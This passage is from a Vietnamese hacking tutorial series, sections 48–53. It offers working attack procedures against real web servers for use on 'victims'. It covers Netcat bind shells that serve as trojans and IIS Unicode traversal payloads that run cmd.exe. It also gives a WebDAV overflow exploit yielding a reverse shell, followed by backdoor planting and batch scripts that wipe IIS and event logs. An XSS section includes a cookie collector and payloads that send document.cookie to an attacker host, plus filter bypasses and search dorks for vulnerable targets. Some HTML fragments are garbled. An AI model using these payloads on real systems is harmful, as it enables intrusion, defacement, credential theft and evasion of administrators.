cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48 . ) Hướng dẫn sử dụng Netcat :

a . ) Giới thiệu :

Netcat là một công cụ không thể thiếu được nếu bạn muốn

hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết

một chút về Netcat .

b . ) Biên dịch :

_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c

+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();

+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE

#define TELNET

- biên dịch: make linux

- chạy thử: ./nc -h

- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại

biến môi trường PATH trong file ~/.bashrc, thêm vào ":."

PATH=/sbin:/usr/sbin:...:.

_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe.

Chỉ vậy giải nén và chạy là xong.

c . ) Các tùy chọn của Netcat :

_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE

C:\>nc -h

connect to somewhere: nc [-options] hostname port[s] [ports] ...

listen for inbound: nc -l -p port [options] [hostname] [port]

options:

-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế

độ steath(không hiển thị trên thanh Taskbar)

-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe

-h ----------- gọi hướng dẫn

-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi

-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến

-L ------------ buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi

ngắt một kết nối.

-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7,

Netcat sẽ không thẩm vấn DNS

-o ------------ file ghi nhật kí vào file

-p port ----- chỉ định cổng port

-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)

-s addr ----- giả mạo địa chỉ IP nguồn là addr

-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet

đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn

gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng

netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến

telnetd.

-u ------------- dùng UDP(mặc định netcat dùng TCP)

-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.

-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.

-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây

-z ------------- chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080

nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD :

_ Chộp banner của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE

C:\>nc 172.16.84.2 80

HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)

HTTP/1.1 200 OK

Date: Sat, 05 Feb 2000 20:51:37 GMT

Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2

OpenSSL/0.9.6 PHP/4.0.4pl1

Connection: close

Content-Type: text/html

Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ

cho biết các thông tin chi tiết hơn nữa)

C:\>nc -vv 172.16.84.1 80

CODE

172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [172.16.84.1] 80 (?) open

HEAD / HTTP/1.0

HTTP/1.1 200 OK

Date: Fri, 04 Feb 2000 14:46:43 GMT

Server: Apache/1.3.20 (Win32)

Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT

ETag: "0-cec-3899eaea"

Accept-Ranges: bytes

Content-Length: 3308

Connection: close

Content-Type: text/html

sent 17, rcvd 245: NOTSOCK

Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.

< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F

< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54

< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap

< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win

< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi

< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb

< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM

< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-

< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep

< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.

< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:

< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio

< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten

< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm

< 000000f0 6c 0d 0a 0d 0a # l....

dấu < nghĩa là server gởi đến netcat

dấu > nghĩa là netcat gởi đến server

_ Quét cổng :

Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy

dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500)

của host 172.16.106.1

CODE

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500

(UNKNOWN) [172.16.106.1] 443 (?) open

(UNKNOWN) [172.16.106.1] 139 (?) open

(UNKNOWN) [172.16.106.1] 111 (?) open

(UNKNOWN) [172.16.106.1] 80 (?) open

(UNKNOWN) [172.16.106.1] 23 (?) open

nếu bạn cần scan các cổng UDP, dùng -u

CODE

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500

(UNKNOWN) [172.16.106.1] 1025 (?) open

(UNKNOWN) [172.16.106.1] 1024 (?) open

(UNKNOWN) [172.16.106.1] 138 (?) open

(UNKNOWN) [172.16.106.1] 137 (?) open

(UNKNOWN) [172.16.106.1] 123 (?) open

(UNKNOWN) [172.16.106.1] 111 (?) open

_ Biến Netcat thành một trojan :

Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng

tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e

<tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1

kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối

với Unix). Ví dụ:

CODE

E:\>nc -nvv -l -p 8080 -e cmd.exe

listening on [any] 8080 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159

sent 0, rcvd 0: unknown socket error

Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn

nhân trên cổng đã định, chẳng hạn như 8080

CODE

C:\>nc -nvv 172.16.84.2 8080

(UNKNOWN) [172.16.84.2] 8080 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

E:\>cd test

cd test

E:\test>dir /w

dir /w

Volume in drive E has no label.

Volume Serial Number is B465-452F

Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe

ntcrash.zip password.txt pwdump.exe

6 File(s) 262,499 bytes

2 Dir(s) 191,488,000 bytes free

C:\test>exit

exit

sent 20, rcvd 450: NOTSOCK

Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi ,

chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương

, các bạn hãy xem tiếp nhé :

CODE

E:\>nc -nvv -L -p 8080 -e cmd.exe

listening on [any] 8080 ...?

?

Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng

nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này>. Ví

dụ:

CODE

netstat -a

...

TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang

lắng nghe

...

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53

listening on [172.16.84.1] 53 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?

?

Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền

Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là

xong.

Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì

netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy

dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49 . ) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để

ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên

lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày

các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng

cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .

_ Trước hết các bạn hãy download activeperl và Unicode.pl .

_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay

không :

CODE

telnet < tên trang Web > 80

GET HEAD / HTTP/1.0

Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các

bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…

_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE

perl unicode.pl

Host: ( gõ địa chỉ server mà các bạn muốn hack )

Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .

_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl )

như sau :

CODE

[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+

[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+

[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+

[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+

[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+

[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+

[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+

[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+

[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+

[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+

[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+

[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+

[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+

[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất

cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17

thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .

Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7

, tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3

hoặc

http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các

bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường

các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ

cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

Những hiểu biết cơ bản nhất để trở thành Hacker (p4)

50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV :

Giới thiệu :

Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính .

Chuẩn bị :

Ngoài những đồ nghề đã giới thiệu ở các bài trước , các bạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để ở trong C:\

Khai thác :

+ Tìm một trang Web dùng IIS 5.0

+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :

C:\>nx -vv -l -p 53

listening on [any] 53 ...

Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .

+ Mở thêm một của sổ DOS nữa .

+ Ta sử dụng WebDAV vừa down về .

c:\wb.exe <IP của máy chủ IIS> <IP của máy tính của mình dùng để tấn công> <cổng lắng nghe> [padding=1,2,3...]

VD :

C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]

www.coromputer.net && undernet #coromputer

Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND

exploiting ntdll.dll through WebDav [ret: 0x00100010]

Connecting... CONNECTED

Sending evil request... SENT

Now if you are lucky you will get a shell.

+ Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó :

C:\>nc -vv -l -p 53

listening on [any] 53 ...

connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> <-- OK đã thành công rùi.

+ Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác , sau đó up lên server vài con backdoor , he he . ( Sử dụng con WinShell, Hack Defensed là ok rùi ) .

+ Sau khi làm xong ta sẽ xoá file log , để xác định file log ta thực hiện câu truy vấn sau :

C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory ! REG.EXE VERSION 2.0

kết quả nó sẽ xuất hiện link để ta xác định file log :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles

He he , đường dẫn file log là C:\WINNT\System32\LogFiles

+ Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoá file log này , ta đánh các lệnh sau :

C:\WINNT\system32>echo iisreset /stop >a.bat ' tạm dừng server IIS

C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xóa nhật kí của IIS

C:\WINNT\system32>echo iisreset /start >>a.bat ' khởi động lại IIS

C:\WINNT\system32>echo ce >>a.bat ' xóa nhật kí của Event Log

C:\WINNT\system32>echo del a.bat >>a.bat ' xóa file a.bat

+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc :

C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy chủ

Nó sẽ cho kết quả như VD sau :

Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM

The command completed successfully

Như vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho file a.bat làm việc sau 5 phút nữa bằng lệnh sau :

C:\WINNT\system32>at 15:05 a.bat

Added a new job with job ID = 1

Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳ vào thông số thời gian bạn đưa vào .

Ta thoát khỏi máy chủ bằng lệnh :

C:\WINNT\system32>exit ' đóng kết nối

sent 207, rcvd 746

+ Lúc này thì mấy admin có tài thánh cũng ko biết là đã có người thâm nhập.

_ Sau này các bạn muốn quay lại cái server trên thì ta đột nhập trực tiếp thông qua backdoor các bạn đã up lên.

_ Kèm theo file Wb.exe tôi đã để thêm 2 file nữa đó là :

+ xoafilelog.exe : dùng để xoá file log trong server của victim .

+ wbscaniis.xpn : dùng để quét xem server victim có bị lỗi này cho ta khai thác hay không , các bạn tự tìm hiểu để sử dụng chúng nhé.

51 . ) Lỗi CROSS SITE SCRIPTING và cách khai thác :

Giới thiệu :

Lỗi XSS ( tên gọi của Cross-Site Scripting ) nói nôm na là hacker có thể thông qua lỗi này để chèn code vào site hay link để chôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọng ở đây có thể là cookie hoặc username + pass để vào tài khoản 1 ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker .

Chuẩn bị :

+ Lấy đoạn code sau save lại thành file cookie.asp rồi up lên host của bạn có hỗ trợ asp ( như brikster.com ) :

<%

Set x = CreateObject("Scripting.FileSystemObject")

Set y = x.OpenTextFile(Server.MapPath("mask.txt"), 8, true)

y.WriteLine Request.QueryString("cookie")

y.Close

Set y = Nothing

Set x = Nothing

%>

Kiểm tra trang Web bị lỗi :

+ 1 site bất kì bao giờ cũng có 1 hoặc tất cả các phần sau : search results, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phần này , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thể nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .

+ Cách tìm lỗi ta chia thành 4 bước :

Bước 1 :

Mở website cần kiểm tra .

Bước 2 :

Bắt đầu kiểm tra , định vị 1 ô tìm kiếm hoặc 1 login form và gửi thông tin đi (nhập thông tin và nhấn submit hay login hay ok gì đó ) , ví dụ nhập chữ "abc" chẳng hạn hay chữ gì cũng được .

Bước 3 :

Xác định khả năng site có bị lỗi XSS hay không bằng cách xem thông tin trả về :

Ví dụ bạn thấy như thế này :

"Your search for 'abc' did not find any items"

"Your search for 'abc' returned the following results"

"User 'abc' is not valid"

"Invalid login 'abc'"

hoặc là cái gì đó mà có dính tới chữ "abc" mà bạn nhập vào ban đầu thì 99% thằng này bi XSS

Bước 4 :

Chèn code thực sự vào nơi bị lỗi :

chèn cái này :

<script>alert('abc')</script>

vào ô ban nãy và nhấn SUBMIT . Nếu sau đó bạn nhận được 1 popup có chữ "abc" thì thằng này 100% bị dính XSS . Nhưng xin chú ý , thỉnh thoảng vẫn có trường hợp website đó bị dính XSS nhưng vẫn không xuất hiện cái popup thì buộc lòng bạn phải VIEW SOURCES nó ra để xem . Khi view sources nhớ kiếm dòng này<script>alert('abc')</script> , nếu có thì XSS đây rồi .

Một ví dụ khác thường gặp hơn :

Gọi http://sitebiloi.com là site bị dính lỗi XSS và ta tìm được nơi bị lỗi như thế này : http://sitebiloi.com/?page=<script>...<script> , nghĩa là ta có thể chèn code ngay trên thanh ADDRESS .

Tôi không thể trình bày hết mọi tình huống được , cái mà các bạn cần là hiểu ra vấn đề thì bạn sẽ hiểu được khi nào bị lỗi .

Khai thác :

+ Lấy lại ví dụ site bị XSS trên thanh address , để lấy cookie của nạn nhân ta làm như thế này :

http://sitebiloi.com/index.asp?page=<script>window.open("http:// địa chỉ trang Web ta vừa up file cookie. asp lên /cookie.asp?cookie="+document.cookie)</script>

thì ngay lập tức đoạn code đã được chèn vào trong web page , và trông như vầy :

<HTML>

<TITLE> Hello all! </TITLE>

hello

<script>window.open("địa chỉ trang Web ta vừa up file cookie.asp lên /cookie.asp?cookie="+document.cookie)</script>

...

</HTML>

Với đoạn code này thì trình duyệt sẽ thi hành đoạn code và sau đó sẽ gửi toàn bộ cookie tới cho bạn ở dạng file .txt và bạn chỉ việc mở file này ra xem .

+ Vậy gặp trường hợp nhà quản trị hạn chế sự xâm nhập bằng cách lọc bỏ các ký tự đặc biệt ta phải làm sao ? Các bạn thử cách thay thế các ký tự đó bằng các mã đại diện . VD :

* Nếu "Bộ lọc" loại bỏ 2 kí tự "<" và ">" :

Hacker sẽ dùng "\x3c" và "\x3e" để thay thế và bắt đầu chèn code với

') + ') + '\x3cscript src=http://hostbanupfile.com/cookie.asp?cookie="+document.cookie\x3e\x3c/script\x3e'

Để tìm hiểu thêm về mã đại diện các bạn hãy download tại :

www32.brinkster.com/anhdenday/ascii.zip về nghiên cứu .

+ Biến các đoạn code nguy hiểm thành lời chú giải (comment) :

Ví dụ khi hacker nhập vào <script>code</script> thì sẽ bị chặn như sau :

<COMMENT>

<!--

code (không được phân tích bởi bộ lọc)

//-->

</COMMENT>

Vượt qua cái này cũng rất dễ bằng cách dùng thẻ đóng </COMMENT> để đóng cái <COMMENT> kia . Nghĩa là ta chèn cái này vào :

<script>

</COMMENT>

<imgfont-size: 10.0pt; mso-bidi-font-size: 12.0pt; font-family: 'Tahoma','sans-serif'; mso-fareast-font-family: 'Times New Roman'; color: yellow;">http://sitebanupfile.com/cookie.asp?cookie...cument.cookie);

"></script>

lúc này đoạn lọc code ban đầu trở thành :

<COMMENT>

<!--

- -->

</COMMENT>

<imghttp://k.domaindlx.com/clairsang/sitebanupfile.com/cookie.asp@cookie=%22+document.cookie%29;">http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); ">

</script>

</COMMENT>

và thế là bộ lọc bị vô hiệu hoá 1 cách nhanh chóng .

52 . ) Tìm hiểu về lỗ hổng Unicode trong Microsoft IIS :

Giới thiệu:

Microsoft IIS là một phần mềm web server. Nó chứa tất cả file của một website, và làm chúng có hiệu lực cho mọi người dùng trên internet. Nhưng như tất cả các phần mềm khác, (đặc biệt là của Microsoft) nó có lỗ hỏng bảo mật Unicode trong IIS của Microsoft, nhưng "không may" những người quản trị thì lại không quan tâm đến việc cài đặt những patch fix lỗi đó. Trong bài hướng dẫn này, ta thảo luận về cách mà lỗi này hoạt động, và Tại sao nó hoạt động được.

Khi bạn viếng thăm một website, địa chỉ của file bạn hiện giờ đang xem sẽ giống như sau:

http://www.someserver.com/

Đây là remote address của web server, hiển thị trên thanh address của trình duyệt. Bất kỳ ai cũng có thể truy cập nó trên internet. Khi vào site này, web server sẽ đưa cho bạn file index, (index.html hay ) của root folder web server. Hầu hết những root folder của một web server là:

C:\inetpub\wwwroot

Đây là thư mục local của web servers, nơi cất giữ tất cả các trang chính của website. Vì vậy nếu bạn gõ địa chỉ sau:

http://www.someserver.com/index.html

Ở trình duyệt, web server sẽ đưa cho bạn local file của nó:

c:\inetpub\wwwroot\index.html

Tôi hy vọng bạn sẽ không quá nhàm chán, việc quan trọng nhất là bạn phải hiểu được sự khác nhau giữa địa chỉ local và remote.

Bây giờ, cái gì sẽ xảy ra nếu ta muốn di chuyển một cặp thư mục lên web server? Ta muốn di chuyển từ c:\inetpub\wwwroot Đến c:\ chúng ta sẽ làm như thế nào? Bạn không thể gõ:

http://www.someserver.com/c:\

Chú thích Web server sẽ bắt đầu đi qua local của nó

c:\inetpub\wwwroot

Đối với những thư mục riêng, và do bạn không thể có : trong thư mục, nó sẽ đỗ vỡ và bạn nhận được thông báo lỗi trong trình duyệt.

Tiếc quá! nó không hoạt động.

Nếu đã quen với FTP, thì bạn cũng biết lệnh DIRUP dùng để làm gì.

Lệnh để đi đến một thư mục ở trên là

/../

Nếu bạn thiết kế bất kỳ web hay mã html nào thì chắc chắn bạn sẽ dùng được rất nhiều.

Vì thế ta chỉ đặt lệnh lẫn nhau, giống như sau

http://www.someserver.com/../../

Và bắt đầu truy cập vào ổ đĩa c local của server?

Tốt, ta bắt đầu khai thác ở đây, nhưng người tạo IIS lại muốn tránh phiền phức, bằng cách làm server từ chối loại yêu cầu này.Vì thế ta phải làm gì đây?Bạn có bao giờ thử download một file mà trong tên của nó có khoảng trống chưa?

Bạn có nhận được thông báo là trình duyệt đã biến đổi khoảng trống đó thành %20 không?

Hãy làm 1 ví dụ. Nếu bạn gõ cái này trong trình duyệt:

http://www.someserver.com/iis Unicode hole.txt

Trình duyệt sẽ thay thế khoảng trống bằng %20 :

http://www.someserver.com/iis%20unicode%20hole.txt

Và sau đó mới cho phép bạn download file.

Đó là cái gì, và tại sao trình duyệt lại phải làm như thế?

Máy tính không thể hiểu được khoảng trống. Đơn giản là chúng không làm được vậy thôi.

%20 ở đây chính là Unicode cho ký tự ASCII mà ta hay gọi là “khoảng trống”.

Ký tự ASCII là những ký tự mà ta thấy trên màn hình khi dùng máy tính. Chỉ có một Unicode cho mỗi ký tự ASCII. Vì thế, khi bạn đưa một khoảng trống vào trình duyệt, nó phải được thay thế bằng cái gì mà cho máy tính có thể hiểu được trước khi nó bắt đầu tìm kiếm.

Để tìm hiểu thêm về ASCII các bạn down tại :

www32.brinkster.com/anhdenday/ascii.zip

Từ khi trình duyệt biến đổi khoảng trống thành ký tự Unicode mới và gửi chúng đến web server mà có thể hiểu được, ta cũng có thể dùng ký tự Unicode để giải thích bất cứ thứ gì ta muốn, và web server sẽ cũng hiểu được chúng. Không chỉ với khoảng trống. Mà ta cũng có thể biến đổi lệnh DIRUP thành Unicode, và gửi chúng đến server. Ta cần biến đổi dấu gạch chéo (/) thành /../../ trong Unicode.

Unicode của / là %5C .

Thật là tuyệt, nếu sau đó tôi chỉ cần gõ

http://www.someserver.com/..%5C.. %5C/

và tôi có thể thấy host được không?

Khai thác ở đây, nhưng có một vài lý do nó không hoạt động.

Đầu tiên, nếu bạn đã làm với server’s local c:\ Bạn sẽ cần một vài thứ để đóng thư mục. Web server sẽ không làm như vậy cho bạn. Vì vậy chúng ta cần mở cmd.exe (dấu nhắc DOS) của server. Trong trình duyệt của bạn! Nhưng chúng ta sẽ quay lại vấn đề này sau.

Thứ hai, khi server giải mã /..%5C.. %5C/

Nó sẽ thành /../../ mà lại bị hạn chế, và sau đó từ chối yêu cầu. Vì thế ta cần phải làm gì, hay mã hoá Unicode đã mã hóa rồi một lần nữa. Có thể bạn sẽ không theo tôi ngay bây giờ, nhưng tôi sẽ cố gắng giải thích một lần nữa. Ta cần mã hoá mọi ký tự của chuỗi Unicode đã có.

Xem bảng dưới sẽ hiểu hơn.

COLOR=purple]ASCII................................. UNICODE[/COLOR]

%........................................ %25

5.......................................... %35

C............................ .............%43

Vì vậy khi ta mã hóa ký tự ASCII /..%5C.. %5C/

Sang Unicode, ta được ..%25%35%43..%25%35%43

Và khi server đọc chuỗi ký tự này, nó sẽ trở lạI /..%5C.. %5C/

Đó không phải là lệnh DIRUP bình thường, nên nó được cho phép.

Nhưng có một vài thứ chúng ta cần biết. Như tôi đã đề cập ở trước, khi bạn kết nối đến một web server, thư mục root mặc định là wwwroot. Thư mục này những trang chính của site. Nhưng có những thư mục khác cho những trang web như yếu tố scripts. Những thư mục này có chứa file mà có khá nhiều thứ quan trọng trong web server. Vì vậy khi vận dụng server, ta cần làm nó từ thư mục mà ta đã có đặc quyền để làm. Điều này không khó; Tôi chỉ muốn bạn hiểu tại sao tôi thêm /scripts/ vào cuối URL.

Rốt cuộc, khi ta thi hành lệnh ở dấu nhắc server’s local dos prompt, ta cần thi hành một lệnh cũng trong cái này. Ta muốn hiển thị c:\ ? Dễ thôi; ta chỉ cần làm vài thủ thuật khác hơn bạn thường làm ở dấu nhắc dos.

Bắt đầu cmd.exe theo cách sau:

cmd.exe?/c+

? = Mọi thứ sau dòng đối số của lệnh.

/c = Thi hành lệnh, sau đó đóng cmd.exe (để cho nó không chạy mãi)

+ = Thay thế cho khoảng trống

Cuối cùng, toàn bộ lệnh ráp lại sẽ như sau:

http://www.myserver.com/scripts/..%25%35%43..%25%35%43/winnt/system32/cmd.exe?/c+dir+c:\

Và bạn thấy được c:\ của servers bên trong trình duyệt. Hehe?

_ Chú thích: Có rất nhiều “lệnh” Unicode khác để cho ta thi hành, nếu cái này không hoạt động (có thể server đã fix được phần nào) thì thử áp dụng những cách sau:

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\

/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\ …….

53 . ) Kỹ thuật hack Hosting controller :

Tìm site bị lỗi :

vào Google.com đánh vào một trong các từ khoá sau :

+ copyright Hosting Controller .

+ allinurl:/advadmin .

+ allinurl:/admin .

Sau khi tìm được ta thử xét trang Web đó có bị lỗi hay ko bằng cách sử dụng 2 đoạn code :

